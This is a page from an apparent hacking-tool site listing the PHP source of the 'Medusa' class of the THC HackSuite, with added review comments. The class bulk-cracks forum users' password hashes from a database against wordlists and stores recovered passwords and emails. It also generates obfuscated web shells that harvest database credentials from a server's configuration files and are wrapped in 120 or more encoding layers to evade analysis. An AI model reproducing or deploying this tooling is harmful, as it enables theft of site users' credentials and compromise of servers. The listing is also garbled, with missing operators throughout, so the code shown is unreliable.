HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite. Note that if you have an earlier version of the suite, updating files manually is not recommended; instead, you should overwrite your existing HackSuite environment.
<?php
/*
Contains all functionality for Medusa.

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/

/* THC Medusa Class */
class THC{
    // NOTE(review): the "=" between each property name and its "" initialiser
    // appears to have been lost when this listing was extracted.
    // Wordlist lines; LoadWordlist() replaces this with the array returned by file().
    var 
$aWords "";
    // Product settings; LoadProperties() copies $_PROPERTIES from the included file here.
    var 
$aProperties "";
    // User rows to test; reset and filled by LoadUsers(), appended to by SetUser().
    var 
$aUserHash "";
    
/* main: method named after the class (the constructor in older PHP versions); it performs no initialisation */
    
function THC(){
    }
    
/* reads a wordlist from ../../Wordlists/ into $this->aWords; returns true on success, false when the file cannot be read */
    function LoadWordlist($sWordlist){
        // Only the name that survives ExploitFilter's file-inclusion filter is
        // appended to the fixed base directory.
        $sCleanName = $this->ExploitFilter($sWordlist,0,1);
        $sPath = "../../Wordlists/".$sCleanName;
        // file() keeps each line's trailing newline; read errors are suppressed
        // and surface only as the false return value.
        $aLines = @file($sPath);
        if($aLines===false){
            return false;
        }
        $this->aWords = $aLines;
        return true;
    }
    
/* loads a product definition from ../forums/ and keeps its $_PROPERTIES array in $this->aProperties; returns false when the file does not exist */
    function LoadProperties($sProduct){
        // The include below executes whatever file this path resolves to, so
        // the file-inclusion filter applied here is the only barrier between
        // the caller-supplied name and arbitrary file inclusion.
        $sProduct = "../forums/".$this->ExploitFilter($sProduct,0,1);
        if(file_exists($sProduct)){
            // NOTE(review): include_once does nothing for a file that was
            // already included, which leaves $_PROPERTIES undefined in this
            // scope on a repeated call for the same product.
            include_once($sProduct);
            $this->aProperties = $_PROPERTIES;
            return true;
        }
        return false;
    }
    
/*
 * runs the SQL text stored in $this->aProperties['queryraw']['attack'] on the
 * implicit mysql_* connection and buffers every row, as an associative array,
 * in $this->aUserHash; the row count is stored in $this->aProperties['total'].
 * The query text itself is not part of this file. CrackUsers() reads the keys
 * 'crackuser', 'crackpass' and optionally 'crackhash' from each row, so the
 * query presumably aliases the product's credential columns to those names
 * (confirm against the product definition files).
 * All mysql_* calls are error-suppressed with @; a failed query ends up as an
 * empty user list rather than an error. The mysql_* extension used here was
 * removed in PHP 7.
 */
    
function LoadUsers(){
        
$rQuery = @mysql_query($this->aProperties['queryraw']['attack']);
        
// UNCOMMENT IF YOU WANT TO SAVE THE QUERY IN test.txt
        // $this->WriteF("test.txt",$this->aProperties['queryraw']['attack'],"w");
        
$this->aProperties['total'] = @mysql_num_rows($rQuery);
        
// any previously loaded users are discarded here
$this->aUserHash = array();
        if(
$this->aProperties['total']!=0){
            while(
false!==($aRow = @mysql_fetch_array($rQuery,MYSQL_ASSOC))){
                
$this->aUserHash[] = $aRow;
            }
        }
    }
    
/*
 * black hat one user cracking: appends one caller-supplied user record to
 * $this->aUserHash without validation. CrackUsers() reads the keys
 * 'crackuser', 'crackpass' and optionally 'crackhash' from each entry.
 */
    
function SetUser($aUser){
        
$this->aUserHash[] = $aUser;
    }
    
/*
 * returns the email address of a user: the placeholder "/user/" in the query
 * template $this->aProperties['queryraw']['getemail'] is replaced by $sUser and
 * the 'temail' column of the first result row is returned. Errors are
 * suppressed with @, so a failed lookup is not distinguishable from an error.
 * NOTE(review): $sUser is placed into the SQL text without escaping, so a
 * user name containing quote characters changes the statement (string-built
 * SQL); a parameterised query is the robust form.
 */
    
function GetEmail($sUser){
        
$rQuery = @mysql_query(str_replace("/user/",$sUser,$this->aProperties['queryraw']['getemail']));
        return(@
mysql_result($rQuery,0,'temail'));
    }
    
/*
 * checks whether the encrypted password matches the hash from the database.
 *
 * The product name in $this->aProperties['name'] selects how the candidate
 * $sPass (trimmed first) is transformed before it is compared with $sHash:
 *   - SMF1, SMF2: SHA-1 of the lower-cased $sUser followed by the password
 *     (the only cases that use $sUser)
 *   - MyBB, IPB, vBulletin3/4/5, Dolphin, AEF, phpFusion: MD5/SHA-1/HMAC
 *     constructions that mix in $sSalt
 *   - FluxBB, Drupal6, MiniBB, Phorum, UseBB, AVS, XMB: a single unsalted
 *     SHA-1 or MD5 of the password
 *   - phpBB, Drupal7, Joomla2/3, Wordpress, Vanilla: delegated to helper
 *     functions/classes that are not defined in this file (presumably supplied
 *     by the included product definition; confirm) and returned directly
 * An unrecognised product name leaves $sEncrypt as "" for the final compare.
 *
 * Every construction computed inline here is one or two rounds of a fast
 * digest, which is why offline dictionary guessing against these stored
 * formats is cheap; a site still holding such hashes should rehash on login
 * to a slow, salted scheme such as password_hash().
 *
 * NOTE(review): the final comparison is a loose ==, which compares
 * numeric-looking hex digests (for example ones starting with "0e" followed
 * by digits) as numbers and can therefore report equality for different
 * strings.
 * NOTE(review): "=" and the "? :" of the ternaries appear to have been
 * dropped from this listing during extraction (e.g. "$sEncrypt "";"), so the
 * text as printed does not parse.
 */
    
function UserLogin($sUser,$sPass,$sHash,$sSalt=""){
        
$sEncrypt "";
        
$sPass trim($sPass);
        switch(
$this->aProperties['name']){
            case
"SMF1":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"SMF2":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"MyBB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"IPB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"vBulletin4":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin3":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin5":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"FluxBB":
            
$sEncrypt = @sha1($sPass);
            break;
            case
"phpBB":
            return(
phpbb_check_hash($sPass,$sHash) ? true false);
            break;
            case
"Drupal6":
            
$sEncrypt = @md5($sPass);
            break;
            case
"Drupal7":
            return(
user_check_password2($sPass,$sHash) ? true false);
            break;
            case
"Dolphin":
            
$sEncrypt sha1(md5($sPass).$sSalt);
            break;
            case
"Joomla3":
            return(
PassHashing($sPass,$sHash) ? true false);
            break;
            case
"Joomla2":
            return(
PassHashing2($sPass,$sHash) ? true false);
            break;
            case
"Wordpress":
            
$cWP = new PasswordHash();
            return(
$cWP->CheckPassword($sPass,$sHash) ? true false);
            case
"Vanilla":
            
$cVanilla = new Gdn_PasswordHash2();
            return(
$cVanilla->CheckPassword($sPass,$sHash,"vanilla") ? true false);            
            break;
            case
"AEF":
            
$sEncrypt md5($sSalt.$sPass);
            break;
            case
"MiniBB":
            
$sEncrypt md5($sPass);
            break;
            case
"Phorum":
            
$sEncrypt md5($sPass);
            break;
            case
"UseBB":
            
$sEncrypt md5($sPass);
            break;
            case
"phpFusion":
            
$sEncrypt hash_hmac("sha256",$sPass,$sSalt);
            break;
            case
"AVS":
            
$sEncrypt md5($sPass);
            break;
            case
"XMB":
            
$sEncrypt md5($sPass);
            break;
        }
        // loose comparison of the computed digest with the stored value (see note above)
        return(
$sEncrypt==$sHash true false);
    }
    
/*
 * creates serialized data so you can keep track of the session's progress.
 *
 * Tests every word in $this->aWords against every entry in $this->aUserHash
 * through UserLogin() and persists the running state so another page can
 * poll it. $iType == 0 records [username, e-mail from GetEmail()] per match;
 * any other value records [username, matching word].
 *
 * Files written relative to the working directory (relevant when examining a
 * host on which this ran):
 *   - results/<id>.txt  PHP-serialized progress array, rewritten on every
 *     10th user, on every match and once at the end; <id> is the first 10 hex
 *     characters of sha1(time().mt_rand(0,10000))
 *   - tasks.php         one line "<id>|<start timestamp>|0" appended per run,
 *     with the trailing 0 rewritten to 1 on completion
 * The results file therefore holds user names together with e-mail addresses
 * or recovered passwords in plain text.
 *
 * Nothing is returned; with an empty $this->aUserHash the call does nothing.
 * NOTE(review): several "=" signs appear to be missing from this listing
 * (e.g. "$iUsers count(...)"), presumably lost in extraction.
 */
    
function CrackUsers($iType){
        
$iUsers count($this->aUserHash);
        if(
$iUsers!=0){
            
// if there are users to crack
            
$aData = array();
            
$aData['tstart'] = time();
            
$aData['total'] = $iUsers;
            
$aData['product'] = $this->aProperties['name'];
            
$aData['version'] = $this->aProperties['version'];
            
$aData['matches'] = 0;
            
$aData['start'] = date('d-m H:i',$aData['tstart']);
            
$aData['current'] = 0;
            
$aData['last_user'] = "";
            
$aData['users'] = array();
            
// create session identifier and filename to store the results into
            
$sFileSession substr(sha1(time().mt_rand(0,10000)),0,10);
            
$sResultsFile "results/".$sFileSession.".txt";
            
$aData['identifier'] = $sFileSession;
            
// create results file
            
$this->WriteF($sResultsFile,serialize($aData),"w");
            
// insert record into task file
            
$this->WriteF("tasks.php",$sFileSession."|".$aData['tstart']."|0\n","a");
            for(
$x=0;$x<$iUsers;$x++){
                
$aData['current']++;
                // progress checkpoint on every 10th user
                if(
is_int($aData['current']/10)){
                    
$this->WriteF($sResultsFile,serialize($aData),"w");
                }
                for(
$y=0;$y<count($this->aWords);$y++){
                    // arguments: user name, trimmed word, 'crackpass' (the stored hash) and the optional 'crackhash' value, which UserLogin() receives as its salt
                    if(@
$this->UserLogin($this->aUserHash[$x]['crackuser'],trim($this->aWords[$y]),$this->aUserHash[$x]['crackpass'],(isset($this->aUserHash[$x]['crackhash']) ? $this->aUserHash[$x]['crackhash'] : ""))==true){
                        
// easy user password, store the email and username
                        
$aData['matches']++;
                        
$aData['last_user'] = $this->aUserHash[$x]['crackuser'];
                        if(
$iType==0){ 
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->GetEmail($aData['last_user']));
                        }
                        else{
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->aWords[$y]);
                        }
                        
$this->WriteF($sResultsFile,serialize($aData),"w");
                        // continue only advances to the next word; the word loop is not left after a match
                        continue;
                    }
                }
            }
            
// finalize record in task file
            
$this->WriteF("tasks.php",str_replace($sFileSession."|".$aData['tstart']."|0",$sFileSession."|".$aData['tstart']."|1",file_get_contents("tasks.php")),"w");
            
// finalize record in data file
            
$this->WriteF($sResultsFile,serialize($aData),"w");

        }
    }
    
/* collects the stored result record of every listed task and returns them together as one JSON array */
    function CreateJSON($aData){
        $aCollected = array();
        $iTasks = count($aData);
        $iTask = 0;
        while($iTask<$iTasks){
            // element 0 of a task row is the session identifier, which is also
            // the base name of its results file
            $sResultPath = "results/".$aData[$iTask][0].".txt";
            $sSerialized = @file_get_contents($sResultPath);
            // loose comparison kept on purpose: unreadable, empty and "0"
            // contents are all skipped
            if($sSerialized!=false){
                // NOTE(review): unserialize() rebuilds whatever the file holds,
                // objects included. These files are expected to contain only
                // the arrays written by CrackUsers(); anyone able to alter a
                // results file controls what is deserialized here.
                $aCollected[] = @unserialize($sSerialized);
            }
            $iTask++;
        }
        return json_encode($aCollected);
    }
    
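/**
     * Lists the names of the non-directory entries directly inside $sDir.
     *
     * Only bare file names are returned (no path prefix), in the order
     * readdir() yields them; sub-directories are not descended into.
     *
     * @param string $sDir directory to read
     * @return array|false list of file names, or false when the directory
     *                     cannot be opened
     */
    function GetFilesByDirectory($sDir){
        $rHandle = @opendir($sDir);
        if(!$rHandle){
            return false;
        }
        $aFileBuffer = array();
        while(false!==($sFile = @readdir($rHandle))){
            if($sFile==="." || $sFile===".."){
                continue;
            }
            if(!is_dir($sDir."/".$sFile)){
                // Plain append. The previous "[] .=" created a null element
                // and concatenated onto it, which only worked by accident.
                $aFileBuffer[] = $sFile;
            }
        }
        @closedir($rHandle);
        return $aFileBuffer;
    }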
    
/* returns the path of every file below $sDir, recursively; despite the name, no filter on the file extension is applied */
    function GetPHPFiles($sDir){
        $aPaths = array();
        $oTree = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($sDir),
            RecursiveIteratorIterator::CHILD_FIRST
        );
        foreach($oTree as $oEntry){
            // directory entries are walked but never reported
            if($oEntry->isDir()){
                continue;
            }
            // the string form of an entry is its path
            $aPaths[] = (string)$oEntry;
        }
        return $aPaths;
    }
    
/*
 * fetches all files that can be created for shell management: walks $sDir
 * recursively and returns the paths of those files that define a variable
 * named $_SYSTEM when included.
 * NOTE(review): the probe works by include_once()-ing every file found, so
 * every file under $sDir is executed in this method's scope merely to test
 * for $_SYSTEM; $sDir must only ever point at trusted definition files.
 * Because of include_once, a file already included earlier in the request is
 * not run again and therefore is not reported.
 */
    
function GetSystemFiles($sDir){
        
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        
$aData = array();
        foreach(
$iterator as $path){
            // reset before each file so a definition from the previous file is not counted again
            unset(
$_SYSTEM);
              if(!
$path->isDir()){
                
$sPath $path->__toString();
                include_once(
$sPath);
                if(isset(
$_SYSTEM)){
                     
$aData[] = $sPath;
                }
              }
        }
        return(
$aData);
    }
    
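/**
     * Reads a (task) file and splits every line on $sSeparate.
     *
     * Lines are taken as file() returns them, so the last field of each row
     * still carries the line's trailing newline. Row keys are the zero-based
     * line numbers.
     *
     * @param string $sFile     path of the file to read
     * @param string $sSeparate field separator, "|" by default
     * @return array|false one array of fields per line, or false when the file
     *                     is unreadable or empty
     */
    function RawToArray($sFile,$sSeparate="|"){
        $aFileData = @file($sFile);
        // An unreadable file (false) and an empty file (empty array) are both
        // reported as false, as before.
        if(!$aFileData){
            return false;
        }
        $aDataBuffer = array();
        foreach($aFileData as $iLine => $sLine){
            // The former "skip empty line" branch was removed: it sat behind a
            // test of explode()'s result and ended in a continue as the last
            // statement of the loop body, so it never changed the outcome.
            $aDataBuffer[$iLine] = @explode($sSeparate,$sLine);
        }
        return $aDataBuffer;
    }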
    
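/**
     * Applies the selected input filters to $sString.
     *
     * - $bXSS: removes tags with strip_tags(). This is tag stripping only, not
     *   context-aware output escaping.
     * - $bFI: reduces the value to a relative path that cannot climb out of
     *   the directory it is later appended to. Characters outside
     *   [a-zA-Z0-9-_./ ] are removed first, then the path is split on "/" and
     *   every empty or dot-only segment (".", "..", "...." and so on) is
     *   dropped, so a leading "/" is dropped as well.
     * - $bSQL: escapes with mysql_real_escape_string(), which needs an open
     *   mysql_* connection (the extension was removed in PHP 7).
     *
     * The previous file-inclusion branch did not do what it intended: it
     * removed "../" and "./" in a single pass, so nested sequences collapsed
     * back into "../", and its whitelist pattern used "[" and "]" as the regex
     * delimiters, which turned the intended character class into an anchored
     * literal that almost never matched.
     *
     * @param mixed $sString value to filter; non-strings are returned unchanged
     * @param mixed $bXSS    truthy to strip tags
     * @param mixed $bFI     truthy to apply the path filter
     * @param mixed $bSQL    truthy to apply SQL escaping
     * @return mixed the filtered string, or the input unchanged when no filter
     *               is selected or the input is not a string
     */
    function ExploitFilter($sString,$bXSS=false,$bFI=false,$bSQL=false){
        if(!$bXSS && !$bFI && !$bSQL){
            return $sString;
        }
        if(!is_string($sString)){
            return $sString;
        }
        if($bXSS){
            $sString = strip_tags($sString);
        }
        if($bFI){
            // Whitelist before looking at path segments, so that removing a
            // disallowed character cannot create a new ".." segment afterwards.
            $sString = preg_replace('/[^a-zA-Z0-9\-_\.\/ ]/','',$sString);
            $aSegments = array();
            foreach(explode("/",$sString) as $sSegment){
                // Segments made only of dots and spaces are dropped: "." and
                // ".." navigate, and some platforms ignore trailing dots and
                // spaces in a name.
                if(trim($sSegment,". ")===""){
                    continue;
                }
                $aSegments[] = $sSegment;
            }
            $sString = implode("/",$aSegments);
        }
        if($bSQL){
            $sString = mysql_real_escape_string($sString);
        }
        return $sString;
    }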
    
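/**
     * Writes $sWrite to $sDest, creating the file when it does not exist.
     *
     * @param string $sDest  destination path
     * @param string $sWrite content to write
     * @param string $sMode  "a" to append (default) or "w" to overwrite; any
     *                       other value falls back to "a"
     * @return bool true only when the file was opened and the complete content
     *              was written; previously a failed or short write still
     *              returned true
     */
    function WriteF($sDest,$sWrite,$sMode="a"){
        if($sMode!="a" && $sMode!="w"){
            $sMode = "a";
        }
        $rNew = @fopen($sDest,$sMode);
        if(!$rNew){
            return false;
        }
        // fwrite() reports failure as false or as a short byte count depending
        // on the PHP version, so compare against the expected length.
        $iWritten = @fwrite($rNew,$sWrite);
        $bComplete = ($iWritten!==false && $iWritten===strlen((string)$sWrite));
        @fclose($rNew);
        return $bComplete;
    }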
    
/* opens a mysql_* connection with the supplied credentials and selects the database; failures are suppressed and nothing is returned */
    function MySQLConnect($aCredentials){
        $sHost = $aCredentials['host'];
        $sLogin = $aCredentials['username'];
        $sSecret = $aCredentials['password'];
        // The link is held only in this local; the other mysql_* calls in the
        // class pass no link and so rely on the implicit last-opened connection.
        $rConnect = @mysql_connect($sHost,$sLogin,$sSecret);
        @mysql_select_db($aCredentials['database']);
    }
    
/*
 * creates a medusa shell: assembles the source text of a stand-alone PHP
 * script in $sShell and either writes it to disk or returns it for display.
 *
 * What the generated script does, as far as the strings below show:
 *   - optional gate on $aOptions['ip']: a request whose REMOTE_ADDR differs is
 *     redirected to http://www.google.com
 *   - optional gate on $aOptions['pass']: the POST field "sPass" must have the
 *     same SHA-1 as the configured password, otherwise a bare password form
 *     is printed
 *   - it walks DOCUMENT_ROOT recursively, looks for a path containing
 *     $aSystem['file'], applies the four expressions in $aSystem['patterns']
 *     (user, database, password, host) to that file's content and prints the
 *     captured database credentials
 *
 * $aOptions['encrypt'] selects source obfuscation. "normal" wraps the script
 * in eval(base64_decode('...')). Any other value wraps it in 120 to 150
 * nested layers, each randomly gzcompress or base64_encode, invoked through
 * $aF[n] entries whose function names are assembled at run time from
 * characters of the fixed $sPull sentence. These layers are encodings, not
 * encryption: no key is involved.
 *
 * Recognisable traits for detection and triage, all taken from the strings
 * below: an unencoded script starts with set_time_limit(0) and iterates
 * $_SERVER['DOCUMENT_ROOT'] with RecursiveDirectoryIterator; the "normal"
 * form is a single eval(base64_decode(...)) statement; the layered form
 * starts with the literal $sPull sentence followed by $aF[...] assignments
 * and a deeply nested chain of $aF[6](...) / $aF[5](...) calls.
 *
 * Return value: with $aOptions['shellcreate'] set, the result of WriteF() for
 * that path; otherwise the HTML-escaped source as a string.
 *
 * $sTemplate is assigned but not used in this method, and the $_DECODE table
 * is built but not referenced afterwards.
 * NOTE(review): many "=" signs appear to be missing from this listing
 * (e.g. "$sShell "set_time_limit..."), presumably lost in extraction, so the
 * text as printed does not parse.
 */
    
function MedusaShell($aSystem,$aOptions){
        
$sShell "set_time_limit(0);\n";
        
$sTemplate "";
        if(isset(
$aOptions['ip'])){
            
// ip protection
            
$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
            
$sShell .= "    header(\"Location: http://www.google.com\");\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        if(isset(
$aOptions['pass'])){
            
// password protection
            
$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
            
$sShell .= "    echo'<html>\n";
            
$sShell .= "    <head></head>\n";
            
$sShell .= "    <body>\n";
            
$sShell .= "    <form method=\"post\">\n";
            
$sShell .= "    <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
            
$sShell .= "    </form>\n";
            
$sShell .= "    </body>\n";
            
$sShell .= "    </html>';\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        
// create shell based on system array
        
$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
        
$sShell .= "foreach(\$iterator as \$path){\n";
        
$sShell .= "    if(!\$path->isDir()){\n";
        
$sShell .= "        \$sPath = \$path->__toString();\n";
        
$sShell .= "        \$sFile = \"".$aSystem['file']."\";\n";
        
$sShell .= "        if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
        
$sShell .= "            \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
        
$sShell .= "        }\n";
        
$sShell .= "        if(strpos(\$sPath,\$sFile)!==false){\n";
        
$sShell .= "            \$sData = file_get_contents(\$sPath);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
        
$sShell .= "            if(!isset(\$aUser[1])){\n";
        
$sShell .= "                continue;\n";
        
$sShell .= "            }\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
        
$sShell .= "            \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
        
$sShell .= "            die(\$sResult);\n";
        
$sShell .= "        }\n";
        
$sShell .= "    }\n";
        
$sShell .= "}\n";
        
$sShell .= "die(\"Failed to get login information.\");\n";
        if(isset(
$aOptions['encrypt'])){
            
// source protection
            
if($aOptions['encrypt']=="normal"){
                
$sShell "eval(base64_decode('".base64_encode($sShell)."'));\n";
            }
            else{
                // decoder preamble: the names noted at the end of each line are the author's labels for what each $aF entry spells out
                
$sEncoder "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
                
$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
                
$sEncoder .= "\$aF = array();\n";
                
$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
                
$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
                
$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
                
$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
                
$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
                
$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
                
$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
                
$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
                // encode and decode functions
                
$_ENCODE = array();
                
$_ENCODE[0] = array(7,"gzcompress");
                
$_ENCODE[1] = array(4,"base64_encode");
                
$_DECODE = array();
                
$_DECODE[0] = array(6,"gzuncompress");
                
$_DECODE[1] = array(5,"base64_decode");
                
// good luck decrypting the shell :p
                
$iEncryptions count($_ENCODE)-1;
                
$iEncryptionLoops mt_rand(120,150);
                for(
$x=0;$x<$iEncryptionLoops;$x++){
                    
$iEncryption mt_rand(0,$iEncryptions);
                    // the named encoder is called here, at generation time, on the current source text
                    
$sShell "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
                }
                
$sShell $sEncoder.$sShell.";";
            }
        }
        if(isset(
$aOptions['shellcreate'])){
            
// save source
            
return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
        }
        else{
            
$sShell str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
            return(
$sShell);
        }
    }
}
?>
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.